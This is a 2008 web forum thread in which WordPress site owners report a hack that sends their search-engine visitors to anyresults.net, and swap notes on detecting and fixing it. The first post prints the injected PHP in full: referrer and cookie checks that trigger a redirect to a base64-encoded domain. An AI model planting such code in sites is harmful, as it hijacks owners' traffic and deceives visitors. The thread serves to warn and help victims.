Digital Point Forums
Money Transfer

Go Back   Digital Point Forums > Design & Development > Site & Server Administration > Security
Google Analytics
Log In to view
your analytics

Reply
 
Thread Tools
  #1  
Old Jun 6th 2008, 6:41 am
lijgeo lijgeo is offline
Banned
 
Join Date: Jun 2007
Posts: 647
lijgeo will become famous soon enough
Angry WORDPRESS HACK - hacker redirect SE traffic to his site

Hi,


anyone noticed huge drop in traffc without any chage in SERP !!

Using wordpress?

then read on!!

then your wordpress is hacked. check your wp-blog-header.php file.

hacker redirectes SE traffic visitors to his site it there is no past cookie set on his site !!!


my wp header file looked like this

Quote:
<?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php

if (! isset($wp_did_header)):
if ( !file_exists( dirname(__FILE__) . '/wp-config.php') ) {
if ( strstr( $_SERVER['PHP_SELF'], 'wp-admin') ) $path = '';
else $path = 'wp-admin/';

require_once( dirname(__FILE__) . '/wp-includes/functions.php');
wp_die("There doesn't seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href='http://codex.wordpress.org/Editing_wp-config.php'>We got it</a>. You can <a href='{$path}setup-config.php'>create a <code>wp-config.php</code> file through a web interface</a>, but this doesn't work for all server setups. The safest way is to manually create the file.", "WordPress &rsaquo; Error");
}

$wp_did_header = true;

require_once( dirname(__FILE__) . '/wp-config.php');

wp();
gzip_compression();

require_once(ABSPATH . WPINC . '/template-loader.php');

endif;

?>

Check whether your header file is like this and chage iif its hacked!!

its redirecting to anyresults.net

whois info of that domain .


Administrative Contact:
N/A
Doren Arnold ()
96 Mowat Ave
Toronto
3553,M6K 3M1
US
Tel. +1.416545545




check immediately and fix if you have this problem. i think we should report this in wp community forum and webhosting of that site
Reply With Quote
  #2  
Old Jun 6th 2008, 6:43 am
trocobob trocobob is offline
Banned
 
Join Date: Sep 2005
Location: Webdiro.com
Posts: 1,443
trocobob has a spectacular aura abouttrocobob has a spectacular aura abouttrocobob has a spectacular aura about
was you header chmodded 777 ?
Reply With Quote
  #3  
Old Jun 6th 2008, 6:44 am
frank.jung frank.jung is offline
Champion of the Naaru
 
Join Date: Apr 2007
Posts: 135
frank.jung is on a distinguished road
You need to give us more details than that.

Sorry for your luck but I am assuming you are the only one with this issue.
__________________
This spot is for sale | This spot is for sale | This spot is for sale | This spot is for sale
Reply With Quote
  #4  
Old Jun 6th 2008, 6:50 am
Scripter Scripter is offline
Hand of A'dal
 
Join Date: Feb 2008
Posts: 276
Scripter is on a distinguished road
As far as I know it's a hack of the wp-config and there is no official fix so far, it even works with the latest WP version. It redirects all traffic from google, but just from google, if you have bookmarked your site and access it, everything looks normal.

It's a widespread problem at the moment and certainly so single incident.
__________________
Free Counter - No registration, many designs, easy copy & paste
Let your visitors generate Backlinks for you with BooQmark
Reply With Quote
  #5  
Old Jun 6th 2008, 6:50 am
Mudra Mudra is offline
Champion of the Naaru
 
Join Date: May 2008
Location: www.funny-junk.co.cc
Posts: 175
Mudra is on a distinguished road
Traffic to my sites has also decreased but no such coding is in my header.php
Please give some more details.
__________________
Sympathy Poems|Celebrity Wallpapers||
Reply With Quote
  #6  
Old Jun 6th 2008, 6:52 am
Scripter Scripter is offline
Hand of A'dal
 
Join Date: Feb 2008
Posts: 276
Scripter is on a distinguished road
Look in your .htaccess, it has a referrer based redirect if you were hacked as far as I know.
__________________
Free Counter - No registration, many designs, easy copy & paste
Let your visitors generate Backlinks for you with BooQmark
Reply With Quote
  #7  
Old Jun 6th 2008, 6:53 am
webjaws webjaws is offline
Banned
 
Join Date: Nov 2007
Location: http://forums.digitalpoint.com/
Posts: 89
webjaws is on a distinguished road
Its not a single incident!!! I had the problem in 2 of my wordpress sites!! A loss of huge traffic...!!! JUST FIXED IT...!! It must be reported to WP community! How such hacks occurs to the xtreme secure WP??

Its redirecting to its redirecting to anyresults.net

We will see more users with the problem soon!!!

Any FIXES available to this hack? How can we prevent?
Reply With Quote
  #8  
Old Jun 6th 2008, 7:38 am
lijgeo lijgeo is offline
Banned
 
Join Date: Jun 2007
Posts: 647
lijgeo will become famous soon enough
see

http://forums.digitalpoint.com/showthread.php?t=863502



there are so many out there

not a single incident !!
Reply With Quote
  #9  
Old Jun 6th 2008, 8:11 am
lijgeo lijgeo is offline
Banned
 
Join Date: Jun 2007
Posts: 647
lijgeo will become famous soon enough
see


http://wordpress.org/support/topic/180938

http://forums.digitalpoint.com/showthread.php?p=8030426


http://forums.digitalpoint.com/showthread.php?p=8039322

just give a search on google using anyresults.net !!

a new 302 hack


see


http://wordpress.org/support/topic/1...=2#post-770581

Last edited by lijgeo; Jun 6th 2008 at 8:23 am.
Reply With Quote
  #10  
Old Jun 9th 2008, 12:22 am
nastynappy nastynappy is offline
Banned
 
Join Date: Jan 2008
Posts: 503
nastynappy is on a distinguished road
er.. but how did your wp-blog-header.php changed??
does anyone else have the access to edit your files?
who edited your wp-blog-header.php ?
Reply With Quote
  #11  
Old Jun 10th 2008, 4:30 am
godsofchaos's Avatar
godsofchaos godsofchaos is offline
of the Nightfall
 
Join Date: Jan 2008
Location: ...PM ME for RESULT ORIENTED SEO!
Posts: 2,294
godsofchaos is a glorious beacon of lightgodsofchaos is a glorious beacon of lightgodsofchaos is a glorious beacon of lightgodsofchaos is a glorious beacon of lightgodsofchaos is a glorious beacon of lightgodsofchaos is a glorious beacon of light
Whoa! Thanks for letting us know. Thankfully, I am so far so good.... Gotta watch out for this prick!!!
Reply With Quote
  #12  
Old Jun 12th 2008, 3:00 pm
sweetfunny sweetfunny is offline
Banned
 
Join Date: Nov 2006
Location: <?include("location.inc");?>
Posts: 5,754
sweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond reputesweetfunny has a reputation beyond repute
He's hit a lot of sites, check out the Alexa graph...

http://www.alexa.com/data/details/tr...results.net?q=

#32,833 in 13 days, compare his traffic to Digitalpoint.
Reply With Quote
  #13  
Old Jun 13th 2008, 12:43 am
lijgeo lijgeo is offline
Banned
 
Join Date: Jun 2007
Posts: 647
lijgeo will become famous soon enough
Angry

just see the inctrese in traffic within 1 month

So its the proof that he hacked so many sites !!

is there anything we can do against him?



Quote:
Originally Posted by sweetfunny View Post
He's hit a lot of sites, check out the Alexa graph...

http://www.alexa.com/data/details/tr...results.net?q=

#32,833 in 13 days, compare his traffic to Digitalpoint.
Reply With Quote
  #14  
Old Jun 18th 2008, 4:18 am
chandan123's Avatar
chandan123 chandan123 is offline
Astral Walker
 
Join Date: Dec 2007
Location: 10K Sign links for 25$ PM me
Posts: 7,316
chandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond reputechandan123 has a reputation beyond repute
any update for this matter ?

#32,833 in 13 days, compare his traffic to Digitalpoint.
Reply With Quote
  #15  
Old Jun 20th 2008, 9:58 am
nastynappy nastynappy is offline
Banned
 
Join Date: Jan 2008
Posts: 503
nastynappy is on a distinguished road
hello.. will anyone tell me how their wp-blogheader file get edited?
why do u guys give permission to other user to use ur files ?
Reply With Quote
  #16  
Old Jun 20th 2008, 10:34 am
lijgeo lijgeo is offline
Banned
 
Join Date: Jun 2007
Posts: 647
lijgeo will become famous soon enough
i think its beacuse of some bug in old WP

Quote:
Originally Posted by nastynappy View Post
hello.. will anyone tell me how their wp-blogheader file get edited?
why do u guys give permission to other user to use ur files ?
Reply With Quote
  #17  
Old Jun 20th 2008, 10:39 am
bbrian017's Avatar
bbrian017 bbrian017 is offline
of the Nightfall
 
Join Date: Mar 2007
Location: www.yawoop.com
Posts: 2,475
bbrian017 is a jewel in the roughbbrian017 is a jewel in the roughbbrian017 is a jewel in the rough
wow this is crazy hehehe
Reply With Quote
  #18  
Old Jun 20th 2008, 11:32 am
AlfaGTV AlfaGTV is offline
Hand of A'dal
 
Join Date: Nov 2007
Location: EU
Posts: 350
AlfaGTV will become famous soon enough
Damned, I just checked all my blogs. Found one that had some weird encrypted javascript code in the wp-blog-header.php file. It was causing a redirect. I just deleted all files and did a new wordpress installation. This blog did 500 uniques average / day in may. Most traffic coming from google, last 2 weeks only 50 uv's/day. I feel really gutted about this, I've spent a lot of time recently trying to write some good unique content on this blog.
Reply With Quote
  #19  
Old Jun 22nd 2008, 7:25 pm
falguni1's Avatar
falguni1 falguni1 is offline
Starcaller
 
Join Date: Oct 2007
Location: beautymakeupdivas.com
Posts: 2,850
falguni1 is a jewel in the roughfalguni1 is a jewel in the roughfalguni1 is a jewel in the rough
http://forums.digitalpoint.com/showthread.php?t=899445

I am facing problem on my wordpress site, should I change to blogger and use their software.
__________________
Website Worth - Buy Condoms -
Reply With Quote
  #20  
Old Jun 23rd 2008, 4:56 am
lijgeo lijgeo is offline
Banned
 
Join Date: Jun 2007
Posts: 647
lijgeo will become famous soon enough
no need replace wp-blog-header.php with a fresh file of installation

Quote:
Originally Posted by falguni1 View Post
http://forums.digitalpoint.com/showthread.php?t=899445

I am facing problem on my wordpress site, should I change to blogger and use their software.
Reply With Quote
Reply

Bookmarks

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Hacker Guarding, Hacker Safe, etc - How important? usasportstraining General Business 0 Dec 1st 2007 2:47 pm
HACKER java script, How to remove it.......and block the hacker? tony vic Security 1 Aug 30th 2007 4:03 pm
redirect all traffic to another site? Gloria HTML & Website Design 3 Feb 27th 2007 4:26 pm
HACKER website needs a custom wordpress theme! RichardRosse Graphics & Multimedia 3 Dec 10th 2006 10:32 am
HACKER website needs a wordpress custom theme RichardRosse Services 13 Dec 8th 2006 10:06 am


All times are GMT -8. The time now is 2:44 am.